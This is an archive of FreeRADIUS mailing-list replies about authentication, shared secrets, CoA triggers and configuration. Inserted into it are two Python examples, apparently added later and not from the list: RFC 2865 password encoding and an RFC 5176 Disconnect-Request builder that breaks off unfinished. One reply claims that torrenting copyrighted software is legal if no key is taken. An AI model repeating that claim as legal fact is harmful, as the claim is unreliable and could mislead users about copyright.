>
>> Do I need to concern myself with the warning?
> Yes. Use the pap module as noted above. See the default configuration file for why this is necessary.

Hi,

Thanks, makes perfect sense. Now it looks like this:

--
[sql] User found in radcheck table
rlm_sql (sql): Released sql socket id: 2
+++[sql] returns ok
++- else else returns ok
++[chap] returns noop
++[mschap] returns noop
++[pap] returns updated
Found Auth-Type = PAP
# Executing group from file /etc/freeradius/sites-enabled/custom
+- entering group PAP {...}
[pap] login attempt with password password
[pap] Using clear text password password
[pap] User authenticated successfully
++[pap] returns ok
# Executing section post-auth from file /etc/freeradius/sites-enabled/custom
+- entering group post-auth {...}
--

What now interests me is how authentication worked at all previously? An invalid password WAS actually rejected, without the pap module showing that it is running. The only reference in the debug that showed that the password was actually checked was one of the following:

User-Password in the request is correct
or
User-Password in the request does NOT match known good password.
Failed to authenticate the user.

Is that the local module?

Thanks again for super support! Even paid support cannot get close to this.

Cheers,
-- 
Johan Meiring
Re: MySQL performance
On 2011/09/20 05:22 PM, Lorenzo Milesi wrote:
> Ok, I missed this, I thought it was a suggestion to me :-)
> http://paste.ubuntu.com/693812/

What is:

Can't connect to SNMP agent with SMUX: Connection refused

Is an SNMP connection of some sort not maybe slowing it down while
authenticating?

--
Johan Meiring
Cape PC Services CC
Re: Slow DB / outstanding requests
On 2011/09/15 06:35 PM, Alan Buxey wrote:
> Just a quick question, how many DB connections do you have in your config?

5

Server was a VM with too little RAM. And therefore a simple SQL query could
take seconds instead of milliseconds. (Suspect swap meltdown, if such a
thing exists.)

Had to wait for the middle of the night to reboot (so more RAM could be
allocated). Server is now perfectly fine.

It was just the first time that I didn't see FR recover after the DB
eventually finished with slow queries.

Cheers,

--
Johan Meiring
Cape PC Services CC
Re: Test
On 2011/09/15 04:49 PM, Alan DeKok wrote:
> Is the list down, or are people quiet?

Suspect they're quiet.

FreeRADIUS works too well!!

--
Johan Meiring
Cape PC Services CC
Slow DB / outstanding requests
Hi,

Seeing as the list is quiet, something that might be of interest.

I am running 2.1.12 on a production server.

The server is (was) severely underpowered and the database was straining.

I was expecting the normal "rejecting duplicate request" (can't remember
the exact error).

Then the server received about 30 access requests in about .1 second.

It then went into a state where the following appeared over and over in
the log:

Mon Sep 12 11:33:46 2011 : Info: WARNING: Child is hung for request 647 in component core module queue.
Mon Sep 12 11:33:46 2011 : Info: WARNING: Child is hung for request 648 in component core module queue.
Mon Sep 12 11:33:46 2011 : Info: WARNING: Child is hung for request 649 in component core module queue.
Mon Sep 12 11:33:46 2011 : Info: WARNING: Child is hung for request 650 in component core module queue.
Mon Sep 12 11:33:46 2011 : Info: WARNING: Child is hung for request 651 in component core module queue.
Mon Sep 12 11:33:46 2011 : Info: WARNING: Child is hung for request 652 in component core module queue.
Mon Sep 12 11:33:46 2011 : Info: WARNING: Child is hung for request 690 in component core module queue.
Mon Sep 12 11:33:46 2011 : Info: WARNING: Child is hung for request 685 in component core module queue.
Mon Sep 12 11:33:47 2011 : Info: WARNING: Child is hung for request 691 in component core module queue.
Mon Sep 12 11:33:47 2011 : Info: WARNING: Child is hung for request 692 in component core module queue.
Mon Sep 12 11:33:47 2011 : Info: WARNING: Child is hung for request 693 in component core module queue.
Mon Sep 12 11:33:47 2011 : Info: WARNING: Child is hung for request 694 in component core module queue.
Mon Sep 12 11:33:47 2011 : Info: WARNING: Child is hung for request 677 in component core module queue.
Mon Sep 12 11:33:47 2011 : Info: WARNING: Child is hung for request 686 in component core module queue.
Mon Sep 12 11:33:48 2011 : Info: WARNING: Child is hung for request 625 in component core module queue.
Mon Sep 12 11:33:48 2011 : Info: WARNING: Child is hung for request 626 in component core module queue.
Mon Sep 12 11:33:48 2011 : Info: WARNING: Child is hung for request 627 in component core module queue.
Mon Sep 12 11:33:48 2011 : Info: WARNING: Child is hung for request 628 in component core module queue.

It never recovered. Had to be restarted. Even with no database queries
outstanding.

Don't know if 2.1.12 has more difficulty with slow databases?

Unfortunately I don't have more info, so this can probably be ignored.

Cheers,

--
Johan Meiring
Cape PC Services CC
Re: CoA proxying again
On 2011/09/06 06:50 PM, Alan DeKok wrote:
>> I believe I saw a request for dynamic home servers recently. Looks like
>> that might be something for me as well.
>
> Maybe. Or, having less work to say "this client can also receive CoA
> requests".
>
>> This would essentially automatically add a coa home server for the
>> client??
>
> That might be easy to add for 3.0.

+1

This would also be a GREAT feature for me.

How far is 3.0 off? 2.12 (or 2.13) maybe?

--
Johan Meiring
Cape PC Services CC
Re: Need help authenticating local users on Apple server
On 2011/08/16 10:39 PM, Raymond Norton wrote:
>> And then list it in the authorize section.
>
> What is the proper syntax for adding the opendirectory module? I am
> getting errors when attempting to start radius:
>
> /usr/local/etc/raddb/sites-enabled/inner-tunnel[195]: Entry is not a reference to a module
> /usr/local/etc/raddb/sites-enabled/inner-tunnel[189]: Errors parsing authenticate section.

Read again.

list it in the authorize section

not the authenticate section

--
Johan Meiring
Cape PC Services CC
Re: How to setup Freeradius in a Domain
On 2011/07/13 06:51 PM, Phil Mayers wrote:
> If you are using Samba as your domain controllers, then you have access
> to the SAM and can extract the LM/NT hash from whatever backend you use.
> So you can just feed that info straight to FreeRADIUS. No need to use
> ntlm_auth / samba membership - just dump the NT hashes somewhere
> FreeRADIUS can get at them, or if you're using LDAP, point FreeRADIUS at
> that LDAP server and make sure it can read the ntPassword attribute.
>
> This is preferable to using ntlm_auth in fact.

OK...

So the ntlm_auth hack is just because a Microsoft Domain Controller/LDAP
refuses to share the ntPassword attribute with anyone that does not look
like Microsoft?

Hopefully Samba4 changes that as it should have a copy of the AD database!

Thanks!

--
Johan Meiring
Cape PC Services CC
Re: General wiki rules
On 2011/07/14 07:09 PM, Arran Cudbard-Bell wrote:
> Ok here's the deal. There are three formats we use on the wiki:
>
> 1. markdown
> 2. restructuredtext
> 3. mediawiki

I spent about 1/2 hour a while ago trying to get a basic guide to either
markdown or restructuredtext.

Google was unhelpful, are there any good tutorials?

--
Johan Meiring
Cape PC Services CC
Re: How to setup Freeradius in a Domain
On 2011/07/13 05:49 PM, Phil Mayers wrote:
> To login with domain credentials, FreeRADIUS must be able to check
> domain credentials.
>
> To check domain credentials, FreeRADIUS must be able to talk to Samba as
> a domain member.

Just for interest sake...

We use a lot of Samba Domain Controllers (samba3, NT4 style domain).

Can you get this to work if you don't want Windows on your network?

(Not something I'm trying to achieve, just curious)

--
Johan Meiring
Cape PC Services CC
Re: FreeRadius Support for WiMAX Sub-TLVs of Sub-TLVs
On 2011/06/03 10:07 AM, Alan DeKok wrote:
> Martin wrote:
>> Did this and it is 3.0.0, but on the official site there is nothing
>> mentioned regarding the 3.0 version. When is 3.0 going to be officially
>> released?
>
> Perhaps this summer.

What hemisphere are you in? :-)

--
Johan Meiring
Cape PC Services CC
Re: Error: User-Name is not the same as MS-CHAP name
On 2011/06/03 02:15 PM, Phil Mayers wrote:
> I'm not downloading a torrent of copyrighted software to fix someone
> else's problem.

As long as you don't get a key, it is legal.

--
Johan Meiring
Cape PC Services CC
Re: Wiki - once upon a time there was documentation
On 2011/06/01 12:17 PM, Phil Mayers wrote:
> ...in which the migration technique was discussed, and help was
> requested to reformat documents which had not migrated seamlessly.

Is the old wiki accessible anywhere so one can help to manually transfer
info?

--
Johan Meiring
Cape PC Services CC
Re: New FreeRADIUS wiki - Help appreciated!
On 2011/05/27 03:22 AM, Arran Cudbard-Bell wrote:
> http://power.freeradius.org:4567 is problematic from here (slow, and

Some ISP's prioritize 4567 differently to 80.

Is there any good reason it runs on 4567?

--
Johan Meiring
Cape PC Services CC
Re: Can FreeRadius connect to ACT! database?
On 2011/04/06 12:52 AM, Gary Gatten wrote:
> Option 4.) Dump data from ACT to a real DB, then dump ACT completely?
> j/k - sorta...
>
> Does ACT support triggers and / or stored procedures? If so it would be
> relatively easy to keep a subset of the ACT DB in MySQL (or whatever)
> and keep it synchronized.
>
> If ACT is ODBC, I'm sure one could install an ODBC driver and write a
> query in SQL (or whatever ACT uses). At that point it wouldn't be any
> different than any other backend data store.
>
> There is probably an option 5 - 10 as well.
>
> Is this a high volume environment? How many requests per sec / minute
> are we guestimating? I ask because if it's low you have many more
> options than if it's high.

Hi all,

ACT is actually a CRM system. Unsure what database it uses, but I suspect
it is Access based (that horrible M$ thing).

My suggestion would be to use a PHP script (called using rlm_exec) that
can query the ACT database directly.

PHP can query weird and wonderful databases using ODBC, and rlm_exec can
call any PHP script.

Cheers,

--
Johan Meiring
Cape PC Services CC
Re: testing which client initiated request ? Client-shortname ... FreeRADIUS-Client-Shortname
On 2011/03/29 09:28 PM, Robert Roll wrote:
> The "Use Packet-Src-IP-Address" does appear to work.. However, I would
> really like to have a set of clients behave the same way. I would really
> like to do something like:
>
> client 1.2.3.4 {
>     secret XX
>     shortname mgmtStation
>     Identical-client 1.2.3.5, 1.2.3.6, 1.2.3,7
> }
>
> Then later on simply test on shortname mgmtStation ?
>
> If there is nothing like Identical-client... I did notice while
> debugging that doing something like:
>
> client 1.2.3.4 {
>     secret XX
>     shortname stMgt
> }
>
> client 1.2.3.5 {
>     secret XX
>     shortname stMgt
> }
>
> Assigning two different IP number clients the same shortname ?
>
> I noticed that when I looked at some logs, the shortname was used in the
> log text for BOTH clients.. This could be exploited for what I want, if
> only the testing client based on shortname worked ?

You could try dynamic clients and different virtual servers.

--
Johan Meiring
Cape PC Services CC
Re: FR 2.1.7 Exits for no reason
On 2011/03/09 01:05 AM, Gary Gatten wrote:
> We have four FR 2.1.7 servers running on RHEL 5 (fully patched). Every
> now and then, for no apparent reason, radiusd just stops. It exits with
> "Exiting normally." to syslog. They don't all exit at the same time.
> Since there are

Hi,

I had the same issue. (I _think_ it was 2.1.7)

Alan's advice was upgrade, there was some stuff fixed.

I upgraded to 2.1.9 (which was the current release at the time). It worked.

Cheers,

--
Johan Meiring
Cape PC Services CC
Re: AW: AW: AW: AW: Authenticating SSH login on a Cisco IOS switch to AD
On 2011/02/14 01:50 PM, Schaatsbergen, Chris wrote:
> That is clear, but it seems it is missing in the Lenny Package somehow
> as
> http://lists.freeradius.org/pipermail/freeradius-users/2011-January/msg00192.html
> has exactly the same problem as me, no modules folder being read causing
> the ntlm_auth not being recognized as module.
>
> Where can I find a proper radiusd.conf? Or where in the radiusd.conf
> should it be?

Looking at config below...

/usr/local/etc/raddb/modules/

Lenny package does NOT put stuff in /usr/local/

Seems you have two versions of freeradius on your system.

Cheers,

--
Johan Meiring
Cape PC Services CC
Re: FR 2.1.0 (ubuntu) proxying to NPS/IAS.
On 2011/02/02 12:32 AM, hellbird wrote:
> Thank you for your answer. I have contacted Microsoft to help me.

Would be really interesting to know if it works contacting them!!

--
Johan Meiring
Cape PC Services CC
Re: Freeradius SQL: PEAP: Tunneled authentication was rejected.
Hi,

Does anyone know what nabble.com is and why the mail looks like this?

Clicking the link below the email does show a properly formatted
response...

On 2011/01/28 12:21 PM, chris wrote:
> Hi Alan,
>
> thx for the response, and yes I read the debug output and I also found
> the site you mentioned, to get more information about the output but,
> as you see in the number of my posting counts, I'm a newbie in using
> radius. And I didn't understand what these messages should mean or how
> it can be fixed...
>
> rlm_eap: processing type mschapv2
> +- entering group MS-CHAP
> rlm_mschap: No Cleartext-Password configured. Cannot create LM-Password.
> rlm_mschap: No Cleartext-Password configured. Cannot create NT-Password.
> rlm_mschap: Told to do MS-CHAPv2 for sqluser with NT-Password
> rlm_mschap: FAILED: No NT/LM-Password. Cannot perform authentication.
> rlm_mschap: FAILED: MS-CHAP2-Response is incorrect
> ++[mschap] returns reject
> rlm_eap: Freeing handler
> ++[eap] returns reject
> auth: Failed to validate the user.
> Login incorrect: [sqluser/] (from client dlink-private-network port 0 via TLS tunnel)
> } # server inner-tunnel
> PEAP: Got tunneled reply RADIUS code 3
> MS-CHAP-Error = \010E=691 R=1
> EAP-Message = 0x04080004
> Message-Authenticator = 0x
> PEAP: Processing from tunneled session code 0x81bd288 3
> MS-CHAP-Error = \010E=691 R=1
> EAP-Message = 0x04080004
> Message-Authenticator = 0x
> PEAP: Tunneled authentication was rejected.
>
> You give me a hint:
>
>> You probably need to list "sql" in the "inner-tunnel" virtual server.
>> In 2.1.10, you can test the inner-tunnel directly, without using PEAP.
>> See the comments at the top of the file.
>
> I will try and give an answer
>
> thx Chris
>
> View this message in context: Re: Freeradius SQL: PEAP: Tunneled authentication was rejected.
> http://freeradius.1045715.n5.nabble.com/Freeradius-SQL-PEAP-Tunneled-authentication-was-rejected-tp3360430p3361206.html
> Sent from the FreeRadius - User mailing list archive
> http://freeradius.1045715.n5.nabble.com/FreeRadius-User-f2740693.html at Nabble.com.

--
Johan Meiring
Cape PC Services CC
Re: SSH with Radius on one Server: no password match by authentication over sshd --- password match over NTRadPING
On 2011/01/24 02:00 AM, Marius.Meisner wrote:
> /etc/pam_radius_auth.conf:
> # server[:port] shared_secret timeout (s)
> 127.0.0.1 secret 2
  ^ This does not match..

> /etc/freeradius/clients.conf:
> ...
> client 110.110.110.0/24 {
  ^ this

And therefore the shared secret is incorrect.

Either fix pam to talk to the 110.110.110 address or fix FreeRADIUS to
have the correct shared secret under the 127.0.0.1 client.

Cheers,

--
Johan Meiring
Cape PC Services CC
Re: Call for 2.1.11
On 2011/01/18 03:58 PM, Alan DeKok wrote:
> Anything else for 2.1.11? It's been 5 months since 2.1.10.
>
> I think the updfromto fixes should go in, if I can figure out how to
> make it work on Linux *and* other systems.

Hi,

I still think this might make a lot of questions go away.

http://lists.freeradius.org/pipermail/freeradius-users/2009-September/msg00357.html

Cheers,

--
Johan Meiring
Cape PC Services CC
Re: Help needed with user authentication
On 2011/01/19 04:24 AM, Luke Hammond wrote:
> Hey, I am new so sorry that I know nothing about FreeRADIUS.
>
> Basically, I found a tutorial and followed it to get Freeradius2, MySQL
> and Daloradius working together.. that part is ok.
>
> But I am confused with this:
>
> I want to have a wireless network, that will be open, and when a user
> connects and tries to browse they get redirected to a page where they
> have to login, and that will talk to freeradius to make sure the user
> is authorised, then it will accept them and continue to where they were
> trying to browse to..
>
> That's basically what I need, but how does Freeradius do that? Where is
> that page so I can edit it with my logo or whatever? Or do I need more
> software to have that login page?
>
> Please assist, am desperate here to get this working.. thanks in
> advance!

Try coova.org/CoovaChilli

--
Johan Meiring
Cape PC Services CC
Re: modules directory
On 2011/01/17 10:37 PM, Christ Schlacta wrote:
> one more question: can there be multiples of ANY module specified? for
> example, can I use two different ldap or sql modules if I were to need
> to (just as a bad example, I propose: 1 radius server, 2 wlans with
> different user bases that can't be merged into one directory for
> whatever reasons).

The first instance of a module is defined (and called) using the module
name, e.g.

Definition:

checkval {
    item =
}

Calling the module:

checkval

The second instance is named and called using the name.

Definition:

checkval blah {
    item = ...
}

Calling the module:

blah

Hope that helps.

--
Johan Meiring
Cape PC Services CC
Re: Deleting stale session automatically with unlang
On 2011/01/14 12:50 PM, Bishal Pun wrote:
> Alan,
>
> While running that command in mysql it clears the session of the user.
> But with radius unlang it is giving an error in the radius log.

I might be wrong, but as far as I know rlm_mysql expects something to
come back from the query.

Can't think of a solution though unless rlm_mysql will allow something
like

%{sql: SELECT 1; UPDATE radacct set AcctStopTime=ADDDATE(AcctStartTime,INTERVAL AcctSessionTime SECOND), AcctTerminateCause='Clear-Stale Session' WHERE UserName='%{User-Name}' and CallingStationId='%{Calling-Station-Id}' and AcctStopTime is null}

--
Johan Meiring
Cape PC Services CC
Re: Freeradius on lenny doesn't permit mschap auth
On 2011/01/14 02:07 PM, Alan DeKok wrote:
>> I attach my debug output
>
> You're running 2.0.4. I suggest upgrading to 2.1.10.
>
>> I'm on Debian/lenny, I will stay on lenny.
>
> That's your choice. But... not our recommendation.

I run debian lenny and 2.1.10.

Download the source. Extract. Run dpkg-buildpackage.

You have a debian package for 2.1.10 that you can install.

It's that simple.

--
Johan Meiring
Cape PC Services CC
Re: Freeradius on lenny doesn't permit mschap auth
On 2011/01/14 03:57 PM, Josip Rodin wrote:
> Actually it's even simpler. Add lenny-backports to sources.list, update,
> and just install the new packages.

Must say I didn't know that backports also maintained freeradius.

--
Johan Meiring
Cape PC Services CC
Re: segfault with rlm_perl
On 2011/01/04 09:59 PM, Anatoly Ivanov wrote:
> Hi,
>
> I am running freeradius (2.1.8) with rlm_perl (5.10.1, USE_ITHREADS) on
> a Debian-Lenny system.
>
> The problem is radius fails with segfault - periodically and
> intermittently. I have no way to reliably reproduce the problem - it
> happens only in production, and it is impossible to reliably predict
> when or backtrace why.
>
> It seems that I am running into some kind of memory allocation error.
> Coredump type #3 (see below) is the most popular one; coredumps with
> backtrace going into perl seem to be rather random (it fails in
> different parts of libperl.so) - again, see below.
>
> I understand that freeradius has a newer version available - but I am
> hesitant to upgrade a production server without a very good reason. And
> I could not find such reason for an upgrade after reading the CHANGELOG
> for 2.1.10. But maybe I am wrong?
>
> Any ideas?

A complete gut feel after reading this says you have a hardware problem -
faulty RAM.

Has this happened from the beginning or suddenly now?

You can try memtesting (http://www.memtest.org/) the server, or a trick
that I've found works sometimes (if you can't take the server out of
production) to show a RAM problem, is to compile a kernel.

I've seen compilation fail at different stages with faulty RAM.

I realise the advice might sound ridiculous, but it has worked for me
before.

--
Johan Meiring
Cape PC Services CC
Re: Voip database
On 2010/12/21 10:01 AM, miha- wrote:
> Thank you @Johan Meiring for that. It is not my intention to spam the
> group and ask the same question again and again. Believe me that I have
> done everything that you said (I changed the secret on the NAS and on
> the radius and I restarted both,...).
>
> So please help me out with this problem. I can see that the secret is
> wrong. But why? The first request goes through:
>
> +- entering group PAP {...}
> [pap] login attempt with password 1122
> [pap] Using clear text password 1122
> [pap] User authenticated successfully
>
> But the second is rejected due to wrong secret.
>
> User-Name = 081609000
> User-Password = \257+\360\350
> [pap] login attempt with password ¯+ðè
> [pap] Using clear text password 1122
> [pap] Passwords don't match
>
> So this is what I am asking. If the first time the secret is right and
> for the second request it is wrong. Could the different encryption (the
> NAS is sending) be causing the problem?

Answer the following:

1) What is the NAS's IP?
2) Post the section in clients.conf defining the NAS
3) Post the NAS config.

--
Johan Meiring
Cape PC Services CC
Re: Voip database
On 2010/12/21 10:26 AM, miha- wrote:
> ##- Activate RADIUS connection
> setProperty com.centile.connectors.aaa.watchdog.enable false
> setProperty com.centile.connectors.aaa radius
> setProperty com.centile.connectors.aaa.localserv intraswitch
> setProperty com.centile.connectors.aaa.localpass 1122
> setProperty com.centile.connectors.aaa.remotserv 1.2.3.5 (ip of freeradius)
> setProperty com.centile.connectors.aaa.remotport 1812
> setProperty com.centile.connectors.aaa.calltype any

I know nothing of centile. Alan is right that you need to ask them..

But, my logic says that you need a line similar to the following on your
centile NAS.

setProperty com.centile.connectors.aaa.remotepass 1122
                                        ^^

--
Johan Meiring
Cape PC Services CC
Re: Voip database
On 2010/12/17 11:41 AM, miha- wrote:
> Hello, this is the user-name and password for the phone that is
> registered on the NAS. The NAS is sending authentication to the
> freeradius server.

Please do NOT confuse the shared secret and the password that the phone
uses.

The shared secret is a secret between the NAS and FreeRADIUS.

The phone's password (in the Access-Request) is encrypted using the
shared secret.

--
Johan Meiring
Cape PC Services CC
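The RFC 2865 User-Password encoding that the two replies above (this one and the earlier "Voip database" debug showing `[pap] login attempt with password ¯+ðè`, plus the pam_radius shared-secret mismatch thread) all turn on, as an added example that is not code from any of the list posts. The shared secret, Request Authenticator and passwords are constructed here; the point is that a NAS/server secret mismatch does not produce an error, it produces a garbage "password" that pap then rejects.

```python
"""RFC 2865 section 5.2 User-Password hiding, written as a troubleshooting aid.

Added example, not code from the mailing list. All values (secret, Request
Authenticator, passwords) are constructed for illustration.
"""
import hashlib

BLOCK = 16  # MD5 digest length; the password is processed in 16-byte chunks


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encode_user_password(password: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Build the User-Password attribute value the NAS puts in an Access-Request.

    The clear-text password is NUL-padded to a multiple of 16 bytes. Each chunk
    is XORed with MD5(shared_secret + previous cipher chunk); the first chunk
    uses the 16-byte Request Authenticator in place of a previous cipher chunk.
    """
    if len(authenticator) != BLOCK:
        raise ValueError("Request Authenticator must be exactly 16 bytes")
    if not 0 < len(password) <= 128:
        raise ValueError("RFC 2865 limits the password to 1..128 bytes")
    padded = password + b"\x00" * (-len(password) % BLOCK)
    out, prev = b"", authenticator
    for i in range(0, len(padded), BLOCK):
        chunk = _xor(padded[i:i + BLOCK], hashlib.md5(secret + prev).digest())
        out, prev = out + chunk, chunk
    return out


def decode_user_password(encoded: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """What the RADIUS server does before pap compares the password.

    Trailing NUL padding is stripped, so a password that itself ends in NUL
    bytes cannot be carried this way. With the wrong shared secret the MD5
    keystream is wrong and the result is random-looking bytes, which is the
    "\\257+\\360\\350" symptom in the debug output.
    """
    if not encoded or len(encoded) % BLOCK:
        raise ValueError("User-Password value must be a non-empty multiple of 16 bytes")
    out, prev = b"", authenticator
    for i in range(0, len(encoded), BLOCK):
        chunk = encoded[i:i + BLOCK]
        out += _xor(chunk, hashlib.md5(secret + prev).digest())
        prev = chunk
    return out.rstrip(b"\x00")


def looks_like_secret_mismatch(decoded: bytes) -> bool:
    """Server-side heuristic: non-printable bytes in a decoded password almost
    always mean the NAS and the server disagree on the shared secret, since
    real passwords are printable text. A printable result proves nothing."""
    return not all(0x20 <= b < 0x7F for b in decoded)


def demo():
    """Constructed values chosen for this example; not from the thread."""
    authenticator = bytes(range(16))  # a real NAS sends 16 fresh random bytes per request
    wire = encode_user_password(b"1122", b"nas-and-radius-secret", authenticator)
    good = decode_user_password(wire, b"nas-and-radius-secret", authenticator)
    bad = decode_user_password(wire, b"some-other-secret", authenticator)
    return good, bad


if __name__ == "__main__":
    good, bad = demo()
    print("correct secret:", good)                                   # b'1122'
    print("wrong secret:  ", bad, "mismatch?", looks_like_secret_mismatch(bad))
```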
Re: Do get in some other file?
On 2010/12/14 11:08 AM, Marinko Tarlac wrote:
> Hi..
>
> It seems that you all have the same teacher... last 15 days this list
> was in some kind of spam attack... Almost the same questions every day...
>
> "Hi I am and I have FR 2.1.10 on Ubuntu. How to add MAC to file?"

I think the answer is here:

http://www.catb.org/~esr/faqs/smart-questions.html

Especially here:

http://www.catb.org/~esr/faqs/smart-questions.html#homework

Maybe someone should tell us who the teacher is so we can ask him to add
some mailing list etiquette to his course?

Cheers,

--
Johan Meiring
Cape PC Services CC
Re: Plz advice on a good captive portal for FreeRadius
On 2010/12/11 06:07 AM, Jayakrishnan wrote:
> Please advise me how to create a Captive portal within the FreeRadius
> AAA server. Is it possible to use NoCatSplash and use FreeRadius
> Authentication and Authorization?

Use CoovaChilli (previously called chillispot).

--
Johan Meiring
Cape PC Services CC
Re: Freeradius COA trigger
On 2010/12/13 05:23 AM, Andrew Paternoster wrote:
> Hi Johan
>
> Do you mind sharing a copy of your COA triggers?

In Perl (rlm_perl) - where I make my decision to disconnect.

---
# Flag the reply when the account balance has run out; the virtual
# server below turns that flag into a Disconnect-Request.
if ($balance == 0) {
    $RAD_REPLY{'Tmp-String-0'} = 'DISCONNECT';
}
---

In my virtual server:

accounting {
    perl
    if ("%{reply:Tmp-String-0}" == "DISCONNECT") {
        update disconnect {
            User-Name = "%{User-Name}"
        }
    }
}

--
Johan Meiring
Cape PC Services CC
Re: configure radius to write detailed log to multiple files
On 2010/12/01 09:05 PM, kabilius smith wrote:
> Hi Alan,
>
> I tried adding another detail module like the following:
>
> detail {
>     detailfile = c:/testfolder/testfile.log
>     detailperm = 0777
> }
>
> detail {
>     detailfile = c:/testfolder/testfile1.log
>     detailperm = 0777
> }

Do the following:

detail mydetail1 {
    detailfile = c:/testfolder/testfile.log
    detailperm = 0777
}

detail mydetail2 {
    detailfile = c:/testfolder/testfile1.log
    detailperm = 0777
}

Then in authorisation/accounting, instead of listing "detail", list
"mydetail1" and "mydetail2".

I.e. when configuring more than one of the same module type, name them and
refer to them by name.

Hope that makes sense.

--
Johan Meiring
Cape PC Services CC
Re: dynamically selecting, which attribute to evaluate
On 2010/12/01 07:46 PM, Alan DeKok wrote:
>> For the meantime, would it be feasible to
>>
>> update control {
>>     temp_attribute := reply:%{control:TicketType}-trigger-reactivation
>> }
>>
>> and later
>>
>> if (%{control:temp_attribute} != "") {
>>     do the rest
>> }
>
> <sigh> I said:
>
> You can't really do two levels of expansion like that, sorry.

Using rlm_perl, you should be able to get the functionality you want.

--
Johan Meiring
Cape PC Services CC
Re: FreeRADIUS 2.1.10 regression in logging behaviour
On 2010/11/27 01:32 PM, Alan DeKok wrote:
> Another fix would be to add a radmin command to re-open just the log
> files.

Squid does something similar.

squid -l logrotate

reopens the log files.

--
Johan Meiring
Cape PC Services CC
Re: Problem with FreeRADIUS + PPPoE + Mikrotik
On 2010/11/24 06:05 AM, Pableus wrote:
> I have not got the exact number right now. We're still doing tests, so
> for now a few clients authenticate with RADIUS, the rest follow as
> usual. What catches my attention is that users only have problems when
> they are passed to the RADIUS, otherwise they do not have problems with
> disconnections.

What you are saying:

"My red car won't drive, but my green car does. What is wrong with my red
car?"

We have NO IDEA.

You will have to troubleshoot yourself and come up with better info.

Cheers,

--
Johan Meiring
Cape PC Services CC
Re: configure output summary
On 2010/11/19 08:55 AM, Stefan Winter wrote:
> away. Much better than running a whacky script, of course!

I feel that adding the script cannot do any harm whatsoever.

I agree that a lot of newbies will not read it, but if _one_ person reads
it a month, it will mean fewer questions on the list!

Cheers,

--
Johan Meiring
Cape PC Services CC
Re: Doubt - Freeradius + Ldap
On 2010/11/04 01:51 PM, eduardo moreira wrote:
> and i use this command to test connection:
> radtest username 123456 10.12.60.19 1812 0 password

"man radtest" gives me this:

    radtest [-d raddb_directory] user password radius-server nas-port-number secret [ppphint] [nasname]

Looking at your command:

    radtest username 123456 10.12.60.19 1812 0 password

This maps to:

    user            = username
    password        = 123456
    radius-server   = 10.12.60.19
    nas-port-number = 1812
    secret          = 0
    ppphint         = password

--
Johan Meiring
Re: Doubt - Freeradius + Ldap
On 2010/11/04 02:16 PM, eduardo moreira wrote:
> raddtest -d /etc/freeradius username password ip-server port-server secret
> but no works.

Copy and paste your command. Do not retype it.

--
Johan Meiring
Re: Doubt - Freeradius + Ldap
On 2010/11/04 02:37 PM, eduardo moreira wrote:
> sorry
> radtest -d /etc/freeradius username 123456 10.12.60.19 1812 password any

That should work. The "any" is probably unnecessary.

What does "freeradius -X" now say?

--
Johan Meiring
Re: FAQ and Wiki down?
On 2010/10/29 04:43 PM, Mark Holmes wrote:
> Works for me also

IE sometimes doesn't work if the website does not start with www. You then need to explicitly specify http://

Try adding http:// in front of wiki.freeradius.org

--
Johan Meiring
Freeradius COA trigger
Hi,

I have a freeradius setup generating CoA successfully (when necessary) after receiving accounting packets. This works well.

Now I want to also make FreeRADIUS generate a CoA by some other means, e.g. a tech support guy clicking "disconnect" on a web page. I.e. I want to somehow trigger a CoA that is not caused by an "update coa {}" block, but by some external trigger.

Is this possible in any way?

--
Johan Meiring
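One way to raise such a packet from outside the server is to have the web backend build and send the RFC 5176 Disconnect-Request (or CoA-Request) itself, which is what FreeRADIUS's own radclient does for the "coa" and "disconnect" packet types. The following is an added example, not code from the original post or from the FreeRADIUS project. It assumes (none of this is stated on the page) that the NAS accepts dynamic-authorization packets on UDP 3799, that a session is identified by User-Name plus Acct-Session-Id, and that the secret and session values are constructed test data. The NAS reply is validated against the request's authenticator before the result is trusted, and a simulated reply lets the exchange be exercised without a NAS on the network.

```python
"""Trigger a Disconnect-Request (or CoA-Request) from outside FreeRADIUS.

Added example, not code from the original post or from the FreeRADIUS project.
Assumptions (not from the page): the NAS accepts RFC 5176 dynamic-authorization
packets on UDP 3799, and a session is identified by User-Name plus
Acct-Session-Id.  The secret and session values are constructed test data.
"""
import hashlib
import socket
import struct
from typing import Dict, Iterable, Optional, Tuple

DISCONNECT_REQUEST, DISCONNECT_ACK, DISCONNECT_NAK = 40, 41, 42
COA_REQUEST, COA_ACK, COA_NAK = 43, 44, 45
USER_NAME, ACCT_SESSION_ID, ERROR_CAUSE = 1, 44, 101


def avp(attr_type: int, value: bytes) -> bytes:
    """Encode one attribute as RFC 2865 type/length/value (length covers the header)."""
    if not 0 < len(value) <= 253:
        raise ValueError("attribute value must be 1..253 bytes")
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def parse_avps(data: bytes) -> Dict[int, bytes]:
    """Decode a run of attributes; a bad length field is treated as a malformed packet."""
    attrs: Dict[int, bytes] = {}
    pos = 0
    while pos < len(data):
        if pos + 2 > len(data):
            raise ValueError("truncated attribute header")
        attr_type, length = data[pos], data[pos + 1]
        if length < 2 or pos + length > len(data):
            raise ValueError("bad attribute length")
        attrs[attr_type] = data[pos + 2:pos + length]
        pos += length
    return attrs


def build_request(code: int, identifier: int, attrs: Iterable[Tuple[int, bytes]], secret: bytes) -> bytes:
    """RFC 5176 2.3: Request Authenticator = MD5(Code+ID+Length+16 zero bytes+Attributes+Secret)."""
    body = b"".join(avp(t, v) for t, v in attrs)
    header = struct.pack("!BBH", code, identifier, 20 + len(body))
    authenticator = hashlib.md5(header + bytes(16) + body + secret).digest()
    return header + authenticator + body


def request_authenticator_ok(packet: bytes, secret: bytes) -> bool:
    """What the NAS checks before acting on a Disconnect/CoA-Request."""
    return hashlib.md5(packet[:4] + bytes(16) + packet[20:] + secret).digest() == packet[4:20]


def check_response(request: bytes, response: bytes, secret: bytes) -> Optional[int]:
    """Return the reply code (ACK or NAK) only if the identifier matches and the
    Response Authenticator MD5(Code+ID+Length+RequestAuth+Attributes+Secret) verifies."""
    if len(response) < 20:
        return None
    code, identifier, length = struct.unpack("!BBH", response[:4])
    if identifier != request[1] or length != len(response):
        return None
    expected = hashlib.md5(response[:4] + request[4:20] + response[20:] + secret).digest()
    return code if expected == response[4:20] else None


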